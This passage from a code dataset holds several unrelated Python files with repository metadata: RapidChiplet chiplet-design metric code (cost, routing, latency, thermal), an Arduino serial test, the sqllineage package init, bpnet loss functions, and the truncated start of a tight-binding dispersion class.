packaging[\"link_routing\"] == \"euclidean\":\n\t\t\tlength = math.sqrt(sum([abs(positions[0][dim] - positions[1][dim]) for dim in range(2)]))\n\t\t\tlink_lengths.append(length)\n\t\t\tlink_lengths_internal[tuple(node_ids)] = length\n\t\t\tlink_lengths_internal[tuple(reversed(node_ids))] = length\n\t# Summarize link lengths\n\tlink_summary = {\n\t\t\"avg\" : sum(link_lengths) / len(link_lengths),\n\t\t\"min\" : min(link_lengths),\n\t\t\"max\" : max(link_lengths),\n\t\t\"all\" : link_lengths\n\t}\n\treturn (link_summary, link_lengths_internal)\n\n# Compute the manufacturing cost estimate\ndef compute_manufacturing_cost(technology, chiplets, placement, packaging, area_summary):\n\t# First, compute the manufacturing cost per chiplet\n\tresults_per_chiplet = {}\n\tfor chiplet_name in set([x[\"name\"] for x in placement[\"chiplets\"]]):\n\t\tresults_per_chiplet[chiplet_name] = {}\n\t\tchiplet = chiplets[chiplet_name]\n\t\ttech = technology[chiplet[\"technology\"]]\n\t\twr = tech[\"wafer_radius\"]\t\t\t\t\t\t\t\t\t\t# Wafer radius\n\t\tdd = tech[\"defect_density\"]\t\t\t\t\t\t\t\t\t\t# Defect density\n\t\twc = tech[\"wafer_cost\"]\t\t\t\t\t\t\t\t\t\t\t# Wafer cost\n\t\tca = chiplet[\"dimensions\"][\"x\"] * chiplet[\"dimensions\"][\"y\"]\t# Chiplet area\n\t\t# Dies per wafer\n\t\tdies_per_wafer = int(math.floor(((math.pi * wr**2) / ca) - ((math.pi * 2 * wr) / math.sqrt(2 * ca))))\n\t\tresults_per_chiplet[chiplet_name][\"dies_per_wafer\"] = dies_per_wafer\n\t\t# Manufacturing yield\n\t\tmanufacturing_yield = 1.0 / (1.0 + dd * ca)\n\t\tresults_per_chiplet[chiplet_name][\"manufacturing_yield\"] = manufacturing_yield\n\t\t# Known good dies\n\t\tknown_good_dies = dies_per_wafer * manufacturing_yield\n\t\tresults_per_chiplet[chiplet_name][\"known_good_dies\"] = known_good_dies\n\t\t# Cost\n\t\tcost = wc / known_good_dies\n\t\tresults_per_chiplet[chiplet_name][\"cost\"] = cost\n\t# Next, compute the manufacturing cost of the interposer if an interposer is used\n\tresults_interposer = {\"cost\" : 0}\n\tif packaging[\"has_interposer\"]:\n\t\tip_tech = 
technology[packaging[\"interposer_technology\"]]\n\t\twr = ip_tech[\"wafer_radius\"]\t\t\t\t\t\t\t\t\t# Wafer radius\n\t\tdd = ip_tech[\"defect_density\"]\t\t\t\t\t\t\t\t# Defect density\n\t\twc = ip_tech[\"wafer_cost\"]\t\t\t\t\t\t\t\t\t# Wafer cost\n\t\tia = area_summary[\"total_interposer_area\"]\t\t\t\t\t\t# Interposer area\n\t\t# Dies per wafer\n\t\tdies_per_wafer = int(math.floor(((math.pi * wr**2) / ia) - ((math.pi * 2 * wr) / math.sqrt(2 * ia))))\n\t\tresults_interposer[\"dies_per_wafer\"] = dies_per_wafer\n\t\t# Manufacturing yield\n\t\tmanufacturing_yield = 1.0 / (1.0 + dd * ia)\n\t\tresults_interposer[\"manufacturing_yield\"] = manufacturing_yield\n\t\t# Known good dies\n\t\tknown_good_dies = dies_per_wafer * manufacturing_yield\n\t\tresults_interposer[\"known_good_dies\"] = known_good_dies\n\t\t# Cost\n\t\tcost = wc / known_good_dies\n\t\tresults_interposer[\"cost\"] = cost\n\t# Compute the overall cost per working chip\n\tpy = packaging[\"packaging_yield\"]\t\t\t\t\t\t\t\t\t# Packaging yield\n\ttotal_cost = (sum([results_per_chiplet[x[\"name\"]][\"cost\"] for x in placement[\"chiplets\"]]) + results_interposer[\"cost\"]) / py\n\treturn {\"total_cost\" : total_cost, \"interposer\" : results_interposer, \"chiplets\" : results_per_chiplet}\n\n# Constructs a graph where nodes are chiplets and interposer-routers and edges are links.\ndef construct_ici_graph(chiplets, placement, topology):\n\tc = len(placement[\"chiplets\"])\t\t\t\t# Number of chiplets\n\tr = len(placement[\"interposer_routers\"])\t# Number of interposer-routers\n\tn = c + r\t\t\t\t\t\t\t\t\t# Number of nodes in the graph\n\t# Construct adjacency list\n\tneighbors = [[] for i in range(n)]\n\t# Iterate through links\n\tfor link in topology:\n\t\tnid1 = (c if link[\"ep1\"][\"type\"] == \"irouter\" else 0) + link[\"ep1\"][\"outer_id\"]\n\t\tnid2 = (c if link[\"ep2\"][\"type\"] == \"irouter\" else 0) + link[\"ep2\"][\"outer_id\"]\n\t\tneighbors[nid1].append(nid2)\n\t\tneighbors[nid2].append(nid1)\n\t# Collect node attributes...\n\trelay_map = [None for i in range(n)]\n\tnodes_by_type = {\"C\" : [], \"M\" : [], \"I\" : []}\n\t#... for chiplets\t\n\tfor nid in range(c):\n\t\tchiplet = chiplets[placement[\"chiplets\"][nid][\"name\"]]\n\t\ttyp = chiplet[\"type\"][0].upper()\n\t\trelay_map[nid] = chiplet[\"relay\"]\n\t\tnodes_by_type[typ].append(nid)\n\t#... 
for interposer-routers \n\tfor nid in range(c, c+r):\n\t\trelay_map[nid] = True\n\t# Return graph\n\treturn (c, r, n, neighbors, relay_map, nodes_by_type)\n\n# Computes a full source-destination path for each combination of sending and receiving chiplets in the following\n# traffic classes: core->core, core->memory, core->io, memory->io\ndef construct_ici_routing(ici_graph, routing):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = ici_graph\n\t# Compute a routing per traffic-class.\n\tclasses = [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]\n\t# The following two dictionaries are the result of this function - they fully determine the routing\n\tpaths_per_class = {cls : {} for cls in classes}\t\n\tn_paths_per_edge_per_class = {cls : {(src,dst) : 0 for src in range(n) for dst in neighbors[src]} for cls in classes}\n\t# Cover all traffic classes without running Dijkstra twice on the same start-vertex\n\tsrc_types = [\"C\",\"M\"]\t\n\tdst_types_by_src_type= {\"C\" : [\"C\",\"M\",\"I\"], \"M\" : [\"I\"]}\n\tfor src_type in src_types:\n\t\t# Run Dijkstra for each sending node in a given traffic class\n\t\t# We minimize the number of hops, not the latency.\n\t\tfor src in nodes_by_type[src_type]:\n\t\t\tdist = [float(\"inf\") for i in range(n)]\t\t\t\t# Distance from SRC in hops\n\t\t\tpreds = [[] for i in range(n)]\t\t\t\t\t\t# Predecessors (can be many for multiple shortest paths)\n\t\t\ttodo = queue.PriorityQueue()\t\t\t\t\t\t# Visited but not yet processed nodes\n\t\t\tdist[src] = 0\n\t\t\ttodo.put((0, src))\n\t\t\t# Explore paths from src to all chiplets\n\t\t\twhile todo.qsize() > 0:\n\t\t\t\t(cur_dist, cur) = todo.get()\n\t\t\t\t# A shorter path to the cur-node has been found -> skip\n\t\t\t\tif cur_dist > dist[cur]:\n\t\t\t\t\tcontinue\n\t\t\t\t# Iterate through neighbors of the cur-node\n\t\t\t\tfor nei in neighbors[cur]:\n\t\t\t\t\tnei_dist = cur_dist + 1\n\t\t\t\t\t# We found a path to nei that is shorter than the currently best known one\n\t\t\t\t\tif nei_dist < dist[nei]:\n\t\t\t\t\t\tdist[nei] = nei_dist\n\t\t\t\t\t\tpreds[nei] = [cur]\n\t\t\t\t\t\t# Only enqueue the \"nei\"-node for processing if it can relay traffic\t\n\t\t\t\t\t\tif relay_map[nei]:\n\t\t\t\t\t\t\ttodo.put((nei_dist, nei))\n\t\t\t\t\t# We found a path equally short than the shortest path\n\t\t\t\t\telif (routing in [\"random\",\"balanced\"]) and (nei_dist == dist[nei]) and (cur not in preds[nei]):\n\t\t\t\t\t\tpreds[nei].append(cur)\n\t\t\t# Use backtracking to construct all src->dst paths for the given traffic class\n\t\t\tfor dst_type in dst_types_by_src_type[src_type]:\n\t\t\t\tfor dst in nodes_by_type[dst_type]:\n\t\t\t\t\tcls = src_type + \"2\" + dst_type\n\t\t\t\t\t# Only look at paths with at least one hop\n\t\t\t\t\tif dst == src:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tpath = [dst]\n\t\t\t\t\tcur = dst\t\t\n\t\t\t\t\twhile cur != src:\n\t\t\t\t\t\t# Balance paths across links\n\t\t\t\t\t\tif routing == \"balanced\":\n\t\t\t\t\t\t\tn_paths = [n_paths_per_edge[(pred,cur)] for pred in preds[cur]]\n\t\t\t\t\t\t\tpred = preds[cur][n_paths.index(min(n_paths))]\n\t\t\t\t\t\t# Randomly select shortest paths\n\t\t\t\t\t\telif routing == \"random\":\n\t\t\t\t\t\t\tpred = preds[cur][rnd.randint(0,len(preds[cur])-1)]\n\t\t\t\t\t\t# Use the minimum index (what BookSim does)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpred = preds[cur][0]\n\t\t\t\t\t\tn_paths_per_edge_per_class[cls][(pred,cur)] += 1\n\t\t\t\t\t\tcur = pred\n\t\t\t\t\t\tpath.insert(0,cur)\t\n\t\t\t\t\tpaths_per_class[cls][(src,dst)] = path\n\t# Return results\n\treturn 
(paths_per_class, n_paths_per_edge_per_class)\n\t\n# Compute the proxy for the ICI latency\ndef compute_ici_latency(technology, chiplets, placement, packaging, ici_graph, ici_routing, link_latencies_internal):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = ici_graph\n\t(paths_per_class, n_paths_per_edge_per_class) = ici_routing\n\tici_latencies = {}\n\t# Dictionary with the latency of relaying a message through a given node\n\tnode_relay_latencies = [(packaging[\"latency_irouter\"] if i >= c else 0) for i in range(n)]\n\t# Dictionary with latencies of entering/exiting a given node\n\tnode_latencies = [None for i in range(c)]\n\t# List of dictionaries for edge latencies\n\tedge_latencies = [{nei : (packaging[\"link_latency\"] if packaging[\"link_latency_type\"] == \"constant\" else int(math.ceil(eval(packaging[\"link_latency\"])(link_latencies_internal[(i,nei)])))) for nei in neighbors[i]} for i in range(n)]\n\t# Iterate through chiplets\n\tfor i in range(len(placement[\"chiplets\"])):\n\t\tchiplet = chiplets[placement[\"chiplets\"][i][\"name\"]]\n\t\tinternal_latency = chiplet[\"internal_latency\"]\n\t\tphy_latency = technology[chiplet[\"technology\"]][\"phy_latency\"]\n\t\tnode_relay_latencies[i] = internal_latency + 2 * phy_latency\n\t\tnode_latencies[i] = internal_latency + phy_latency\n\t# Iterate through traffic classes\n\tfor traffic in [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]:\n\t\t# Compute latencies of all paths in this class\n\t\tlatencies = []\n\t\tfor (src,dst) in paths_per_class[traffic]:\n\t\t\tpath = paths_per_class[traffic][(src,dst)]\n\t\t\tlat = node_latencies[path[0]]\t\t\t\t\t\t\t\t\t\t\t\t\t# Start-node\n\t\t\tlat += sum([node_relay_latencies[path[i]] for i in range(1, len(path)-1)])\t\t# Relaying chiplets\n\t\t\tlat += sum([edge_latencies[path[i]][path[i+1]] for i in range(len(path)-1)]) \t# Link latency\n\t\t\tlat += node_latencies[path[-1]]\t\t\t\t\t\t\t\t\t\t\t\t\t# End node\n\t\t\tlatencies.append(lat)\n\t\t# Compute and store statistics\n\t\tici_latencies[traffic] = {}\n\t\tici_latencies[traffic][\"avg\"] = sum(latencies) / len(latencies)\n\t\tici_latencies[traffic][\"min\"] = min(latencies)\n\t\tici_latencies[traffic][\"max\"] = max(latencies)\n\t\tici_latencies[traffic][\"all\"] = latencies\n\t# Return results\n\treturn ici_latencies\n\n# Compute the proxy for the ICI throughput \ndef compute_ici_throughput(chiplets, placement, ici_graph, ici_routing):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = ici_graph\n\t(paths_per_class, n_paths_per_edge_per_class) = ici_routing\n\tici_throughputs = {}\n\t# Iterate through traffic classes\n\tfor traffic in [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]:\n\t\tici_throughputs[traffic] = {}\n\t\t# Compute the maximum theoretically possible throughput\n\t\tsending_units = sum([chiplets[x[\"name\"]][\"unit_count\"] for x in placement[\"chiplets\"] if (chiplets[x[\"name\"]][\"type\"][0].upper() == traffic[0])])\n\t\t# Compute throughputs of all paths in this class\n\t\tpath_throughputs = []\n\t\tfor (src,dst) in paths_per_class[traffic]:\n\t\t\tpath = paths_per_class[traffic][(src,dst)]\n\t\t\tpath_throughputs.append(1.0 / max([n_paths_per_edge_per_class[traffic][(path[i], path[i+1])] for i in range(len(path)-1)]))\n\t\t# Use the most congested path as proxy to estimate congestion\n\t\tn_paths = len(path_throughputs)\n\t\tpath_throughputs_sorted = sorted(path_throughputs)\n\t\ttp = min((n_paths * path_throughputs_sorted[0]) / sending_units, 1.0)\n\t\t# Compute and store 
statistics\n\t\tici_throughputs[traffic][\"fraction_of_theoretical_peak\"] = tp\n\t\tici_throughputs[traffic][\"all_per_path_throughputs\"] = path_throughputs\n\t# Return results\n\treturn ici_throughputs\n\t\t\n# Perform the thermal analysis\ndef compute_thermal_analysis(chiplets, placement, packaging, thermal_config, area_summary):\t\n\t# Compute grid-size\n\tresolution\t= thermal_config[\"resolution\"]\n\trows = int(math.ceil(area_summary[\"chip_height\"] / resolution))\n\tcols = int(math.ceil(area_summary[\"chip_width\"] / resolution))\n\t(cell_width, cell_height) = (area_summary[\"chip_width\"] / cols, area_summary[\"chip_height\"] / rows)\n\t# For each grid-cell, compute the temperature increase due to incoming energy from chiplets / irouters\n\ttemperature_in = [[0 for i in range(cols)] for j in range(rows)]\n\tk_c = thermal_config[\"k_c\"]\n\tk_i = thermal_config[\"k_i\"]\n\t# Compute incoming power due to chiplets\t\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t(x,y) = (chiplet_desc[\"position\"][\"x\"],chiplet_desc[\"position\"][\"y\"])\n\t\t(w,h) = (chiplet[\"dimensions\"][\"x\"],chiplet[\"dimensions\"][\"y\"])\n\t\tchiplet_pwr = chiplet[\"power\"]\n\t\tpwr_per_mm2 = chiplet_pwr / (w *h)\n\t\ttemp_per_mm2 = pwr_per_mm2 * k_c\n\t\trow = int(math.floor(y / cell_height))\n\t\twhile row <= (((y + h) / cell_height) - 1) and row < rows:\n\t\t\tcol = int(math.floor(x / cell_width))\n\t\t\twhile col <= (((x + w) / cell_width) - 1) and col < cols:\n\t\t\t\ttemperature_in[row][col] += temp_per_mm2\n\t\t\t\tcol += 1\n\t\t\trow +=1 \n\t# Compute incoming power due to interposer_routers\n\t# TODO: For now, we simply add the energy to a single cell. For high resolutions, this can produce hotspots.\n\tirouter_pwr = (packaging[\"power_irouter\"] if \"power_irouter\" in packaging else 0)\n\tfor irouter in placement[\"interposer_routers\"]:\n\t\t(x,y) = (irouter[\"position\"][\"x\"],irouter[\"position\"][\"y\"])\n\t\trow = int(math.floor(y / cell_height))\n\t\tcol = int(math.floor(x / cell_width))\n\t\ttemperature_in[row][col] += (irouter_pwr * k_i)\n\t# Perform simulation\n\tamb = thermal_config[\"ambient_temperature\"]\n\tk_t = thermal_config[\"k_t\"]\n\tk_s = thermal_config[\"k_s\"]\n\tk_hs = thermal_config[\"k_hs\"]\n\ttemperature = [[amb for i in range(cols)] for j in range(rows)]\n\titer_count = 0\n\tdiff = float(\"inf\")\n\twhile iter_count < thermal_config[\"iteration_limit\"] and diff > thermal_config[\"threshold\"]:\n\t\titer_count += 1\n\t\ttemperature_new = copy.deepcopy(temperature)\t\n\t\t# Update all grid cells\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\t# Apply incoming energy form chiplets / irouters \n\t\t\t\ttemperature_new[row][col] += temperature_in[row][col]\n\t\t\t\t# Apply horizontal heat transfer\n\t\t\t\tfrom_left = 0 if col == 0 else (temperature[row][col-1] - temperature[row][col])\n\t\t\t\tfrom_right = 0 if col == (cols - 1) else (temperature[row][col+1] - temperature[row][col])\n\t\t\t\tfrom_bottom = 0 if row == 0 else (temperature[row-1][col] - temperature[row][col])\n\t\t\t\tfrom_top = 0 if row == (rows - 1) else (temperature[row+1][col] - temperature[row][col])\n\t\t\t\ttemperature_new[row][col] += k_t * (from_left + from_right + from_bottom + from_top)\n\t\t\t\t# Apply outgoing energy through heat sink \n\t\t\t\ttemperature_new[row][col] -= (k_hs * abs(temperature[row][col] - amb))\n\t\t# Apply heat dissipated through the side of the chip\n\t\tfor row in 
range(rows):\t\n\t\t\ttemperature_new[row][0] -= (k_s * abs(temperature[row][0] - amb))\n\t\t\ttemperature_new[row][cols-1] -= (k_s * abs(temperature[row][cols-1] - amb))\n\t\tfor col in range(cols):\t\n\t\t\ttemperature_new[0][col] -= (k_s * abs(temperature[0][col] - amb))\n\t\t\ttemperature_new[rows-1][col] -= (k_s * abs(temperature[rows-1][col] - amb))\n\t\t# Compute the total change in temperature \n\t\tdiff_sum = sum([abs(temperature[row][col] - temperature_new[row][col]) for row in range(rows) for col in range(cols)])\n\t\tdiff = diff_sum / (rows * cols)\n\t\t# Update grid\n\t\ttemperature = temperature_new\n\ttemperature_flat = [x for inner in temperature for x in inner]\n\tthermal_analysis = {\n\t\t\"avg\" : sum(temperature_flat) / len(temperature_flat),\n\t\t\"min\" : min(temperature_flat),\n\t\t\"max\" : max(temperature_flat),\n\t\t\"grid\" : temperature,\n\t\t\"iterations_simulated\" : iter_count\n\t}\n\treturn thermal_analysis \n\t\t\n# Compute the selected metrics\ndef compute_metrics(design, results_file, compute_area, compute_power, compute_link, compute_cost, compute_latency, compute_throughput, compute_thermal, routing):\n\t# Results\n\tresults = {}\n\t# Timing\n\ttiming = {}\n\tstart_time_overall = time.time()\t\n\tstart_time = time.time()\t\n\t# Update flags for metrics that are internally used for other metrics\n\tcompute_ici_graph = compute_latency or compute_throughput\n\tcompute_area = compute_area or compute_cost or compute_thermal\n\tcompute_link = compute_link or compute_latency\n\t# Technology node\n\ttechnology = None\n\tif compute_cost or compute_latency:\t\n\t\ttechnology = hlp.read_file(filename = design[\"technology_nodes_file\"])\n\t# Chiplets \n\tchiplets = None\n\tif compute_area or compute_power or compute_link or compute_cost or compute_ici_graph or compute_latency or compute_throughput or compute_thermal:\t\n\t\tchiplets = hlp.read_file(filename = design[\"chiplets_file\"])\n\t# Placement\n\tplacement = None\n\tif compute_area or compute_power or compute_link or compute_cost or compute_ici_graph or compute_latency or compute_throughput or compute_thermal:\t\n\t\tplacement = hlp.read_file(filename = design[\"chiplet_placement_file\"])\n\t# Topology\n\ttopology = None\n\tif compute_link or compute_ici_graph:\t\n\t\ttopology = hlp.read_file(filename = design[\"ici_topology_file\"])\n\t# Packaging\n\tpackaging = None\n\tif compute_power or compute_link or compute_cost or compute_latency or compute_thermal:\t\n\t\tpackaging = hlp.read_file(filename = design[\"packaging_file\"])\n\t# Temperature Config \n\tthermal_config = None\n\tif compute_thermal:\n\t\tthermal_config = hlp.read_file(filename = design[\"thermal_config\"])\n\t# Update timing stats\n\ttiming[\"reading_inputs\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Validate design\n\tif not vld.validate_design(design, technology, chiplets, placement, topology, packaging, thermal_config):\n\t\tprint(\"warning: This design contains validation errors - the RapidChiplet toolchain might fail.\")\n\t# Update timing stats\n\ttiming[\"validating\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Only construct the ICI graph if we need it (i.e. 
if latency or throughput are computed)\n\tif compute_ici_graph:\n\t\tici_graph = construct_ici_graph(chiplets, placement, topology)\n\t\tif not vld.validate_ici_graph(ici_graph):\n\t\t\tprint(\"warning: The ICI topology contains validation errors - the RapidChiplet toolchain might fail.\")\n\t\tici_routing = construct_ici_routing(ici_graph, routing)\n\t# Update timing stats\n\ttiming[\"processing_inputs\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Compute the area summary\n\tif compute_area:\n\t\tarea_summary = compute_area_summary(chiplets, placement)\n\t\tresults[\"area_summary\"] = area_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_area_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the power summary\n\tif compute_power:\n\t\tpower_summary = compute_power_summary(chiplets, placement, packaging)\n\t\tresults[\"power_summary\"] = power_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_power_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the link summary\n\tlink_lengths_internal = None\n\tif compute_link:\n\t\t(link_summary, link_lengths_internal) = compute_link_summary(chiplets, placement, topology, packaging)\n\t\tresults[\"link_summary\"] = link_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_link_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the manufacturing cost\n\tif compute_cost:\n\t\tmanufacturing_cost = compute_manufacturing_cost(technology, chiplets, placement, packaging, area_summary)\n\t\tresults[\"manufacturing_cost\"] = manufacturing_cost \n\t\t# Update timing stats\n\t\ttiming[\"computing_manufacturing_cost\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute ICI latency\n\tif compute_latency:\n\t\tici_latency = compute_ici_latency(technology, chiplets, placement, packaging, ici_graph, ici_routing, link_lengths_internal)\n\t\tresults[\"ici_latency\"] = ici_latency \n\t\t# Update timing stats\n\t\ttiming[\"computing_ici_latency\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute ICI throughput\n\tif compute_throughput:\n\t\tici_throughput = compute_ici_throughput(chiplets, placement, ici_graph, ici_routing)\n\t\tresults[\"ici_throughput\"] = ici_throughput\n\t\t# Update timing stats\n\t\ttiming[\"computing_ici_throughput\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Thermal analysis\n\tif compute_thermal:\n\t\tthermal_analysis = compute_thermal_analysis(chiplets, placement, packaging, thermal_config, area_summary)\n\t\tresults[\"thermal_analysis\"] = thermal_analysis \n\t\t# Update timing stats\n\t\ttiming[\"thermal_analysis\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Update timing stats\n\ttiming[\"total_runtime\"] = time.time() - start_time_overall\n\t# Add timing to results\n\tresults[\"runtime\"] = timing\n\t# Store results\n\thlp.write_file(\"./results/%s.json\" % results_file, results)\n\nif __name__ == \"__main__\":\n\t# Read command line arguments\n\tparser = argparse.ArgumentParser()\t\n\tparser.add_argument(\"-df\", \"--design_file\", required = True, help = \"Path to the \\\"design\\\" input file\") \n\tparser.add_argument(\"-rf\", \"--results_file\", required = True, help = \"Name of the results file (is stored in ./results/)\")\n\tparser.add_argument(\"-r\", \"--routing\", required = False, help = \"Use the non-default \\\"balanced\\\" or \\\"random\\\" routing\")\n\tparser.add_argument(\"-as\", \"--area_summary\", 
action=\"store_true\", help = \"Compute the area summary\")\n\tparser.add_argument(\"-ps\", \"--power_summary\", action=\"store_true\", help = \"Compute the power summary\")\n\tparser.add_argument(\"-ls\", \"--link_summary\", action=\"store_true\", help = \"Compute the link summary\")\n\tparser.add_argument(\"-c\", \"--cost\", action=\"store_true\", help = \"Compute the manufacturing cost\")\n\tparser.add_argument(\"-T\", \"--thermal\", action=\"store_true\", help = \"Compute the thermal analysis\")\n\tparser.add_argument(\"-l\", \"--latency\", action=\"store_true\", help = \"Compute the ICI latency\")\n\tparser.add_argument(\"-t\", \"--throughput\", action=\"store_true\", help = \"Compute the ICI throughput\")\n\targs = parser.parse_args()\n\t# Read the design file\n\tdesign = hlp.read_file(filename = args.design_file)\n\t# Compute metrics\n\tcompute_metrics(design = design, \n\t\t\t\t\tresults_file = args.results_file, \n\t\t\t\t\tcompute_area = args.area_summary,\n\t\t\t\t\tcompute_power = args.power_summary,\n\t\t\t\t\tcompute_link = args.link_summary,\n\t\t\t\t\tcompute_cost = args.cost, \n\t\t\t\t\tcompute_latency = args.latency,\n\t\t\t\t\tcompute_throughput = args.throughput,\n\t\t\t\t\tcompute_thermal = args.thermal,\n\t\t\t\t\trouting = args.routing)\n\n","repo_name":"spcl/rapidchiplet","sub_path":"rapid_chiplet.py","file_name":"rapid_chiplet.py","file_ext":"py","file_size_in_byte":24389,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"2834322523","text":"from time import sleep\nimport serial\nimport numpy as np\n#is this better in another file?\nser = serial.Serial(port='/dev/cu.usbmodem1411', baudrate=9600, bytesize=8, timeout=10000)\n\n#counter = 32 # Below 32 everything in ASCII is gibberish\ngenomes = 10\ngenes = 8\nbigdaddy = np.random.rand(genomes,genes,genes)\nbigmommy = np.around(bigdaddy)\nprint(bigmommy)\n#convert array into string?\n#if 10000000=1\n#if 10100000=4\n\n\n#convert the list of 8 bits into a byte\n#testlist = [[1, 1, 1, 1, 1, 1, 1, 1],[1, 1, 1, 1, 1, 1, 1, 0]]\n#print(testlist)\n\nbytelist=[]\n\n\ntempbits= 0\nfor j in range(len(bigmommy[0])):\n tempbits = 0\n for i in range(len(bigmommy[0][j])):\n if bigmommy[0][j][i] == 1:\n tempbits += 2**(7-i)\n print(tempbits)\n bytelist.append(tempbits)\n\nprint(bytelist)\n#testbyte = bytes(testlist)\n#print(testbyte)\n\n#print(testarray2)\nwhile False:\n #counter +=1\n #ser.write(str(chr(counter))) # Convert the decimal number to ASCII then send it to the Arduino\n ser.write(bytelist)\n print (ser.readline()) # Read the newest output from the Arduino\n sleep(.8) # Delay for one tenth of a second\n #if counter == 255:\n #counter = 32","repo_name":"RenaldoDaVinci/SwitchNE","sub_path":"Switch/Arduino/Arduino_test.py","file_name":"Arduino_test.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14657754907","text":"import logging.config\nimport os\n\n\ndef _monkey_patch() -> None:\n try:\n from sqlparse.engine import grouping\n from sqllineage.utils.sqlparse import group_function_with_window\n\n grouping.group_functions = group_function_with_window\n except ImportError:\n # when imported by setup.py for constant variables, dependency is not ready yet\n pass\n\n\n_monkey_patch()\n\nNAME = \"sqllineage\"\nVERSION = \"1.3.1\"\nDEFAULT_LOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\"default\": {\"format\": 
\"%(levelname)s: %(message)s\"}},\n \"handlers\": {\n \"console\": {\n \"level\": \"WARNING\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n }\n },\n \"loggers\": {\n \"\": {\n \"handlers\": [\"console\"],\n \"level\": \"WARNING\",\n \"propagate\": False,\n \"filters\": [],\n },\n \"werkzeug\": {\n \"handlers\": [\"console\"],\n \"level\": \"ERROR\",\n \"propagate\": False,\n \"filters\": [],\n },\n },\n}\nlogging.config.dictConfig(DEFAULT_LOGGING)\n\nSTATIC_FOLDER = \"build\"\nDATA_FOLDER = os.environ.get(\n \"SQLLINEAGE_DIRECTORY\", os.path.join(os.path.dirname(__file__), \"data\")\n)\nDEFAULT_HOST = \"localhost\"\nDEFAULT_PORT = 5000\n","repo_name":"shalevy1/sqllineage","sub_path":"sqllineage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"15109432806","text":"\"\"\"Loss functions\n\"\"\"\nimport tensorflow as tf\nimport keras.losses as kloss\nfrom concise.utils.helper import get_from_module\nimport keras.backend as K\nimport gin\nfrom gin import config\n\n\n@gin.configurable\ndef multinomial_nll(true_counts, logits):\n \"\"\"Compute the multinomial negative log-likelihood along the sequence (axis=1)\n and sum the values across all each channels\n\n Args:\n true_counts: observed count values (batch, seqlen, channels)\n logits: predicted logit values (batch, seqlen, channels)\n \"\"\"\n # swap axes such that the final axis will be the positional axis\n logits_perm = tf.transpose(logits, (0, 2, 1))\n true_counts_perm = tf.transpose(true_counts, (0, 2, 1))\n\n counts_per_example = tf.reduce_sum(true_counts_perm, axis=-1)\n\n dist = tf.contrib.distributions.Multinomial(total_count=counts_per_example,\n logits=logits_perm)\n\n # Normalize by batch size. 
One could also normalize by\n # sequence length here.\n batch_size = tf.to_float(tf.shape(true_counts)[0])\n\n return -tf.reduce_sum(dist.log_prob(true_counts_perm)) / batch_size\n\n\n@gin.configurable\nclass CountsMultinomialNLL:\n\n def __init__(self, c_task_weight=1):\n self.c_task_weight = c_task_weight\n\n def __call__(self, true_counts, preds):\n probs = preds / K.sum(preds, axis=-2, keepdims=True)\n logits = K.log(probs / (1 - probs))\n\n # multinomial loss\n multinomial_loss = multinomial_nll(true_counts, logits)\n\n mse_loss = kloss.mse(K.log(1 + K.sum(true_counts, axis=(-2, -1))),\n K.log(1 + K.sum(preds, axis=(-2, -1))))\n\n return multinomial_loss + self.c_task_weight * mse_loss\n\n def get_config(self):\n return {\"c_task_weight\": self.c_task_weight}\n\n\n@gin.configurable\nclass PoissonMultinomialNLL:\n\n def __init__(self, c_task_weight=1):\n self.c_task_weight = c_task_weight\n\n def __call__(self, true_counts, preds):\n probs = preds / K.sum(preds, axis=-2, keepdims=True)\n logits = K.log(probs / (1 - probs))\n\n # multinomial loss\n multinomial_loss = multinomial_nll(true_counts, logits)\n\n poisson_loss = kloss.poisson(K.sum(true_counts, axis=(-2, -1)),\n K.sum(preds, axis=(-2, -1)))\n\n return multinomial_loss + self.c_task_weight * poisson_loss\n\n def get_config(self):\n return {\"c_task_weight\": self.c_task_weight}\n\n\nAVAILABLE = [\"multinomial_nll\",\n \"CountsMultinomialNLL\",\n \"PoissonMultinomialNLL\"]\n\n\ndef get(name):\n try:\n return kloss.get(name)\n except ValueError:\n return get_from_module(name, globals())\n","repo_name":"kundajelab/bpnet","sub_path":"bpnet/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"28417634896","text":"import numpy as np\nimport time\nimport Lattice\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nimport sys \n\n\n#Hack for now, search for: choose dispersion wherever we want to change dispersion\nclass Dispersion_TB_single_band:\n\n def __init__(self, hop, fill,size_E,Machine=None):\n\n self.hop=hop\n if Machine is None:\n self.Machine = \"\"\n else:\n self.Machine = Machine \n \n\n #GRIDS AND 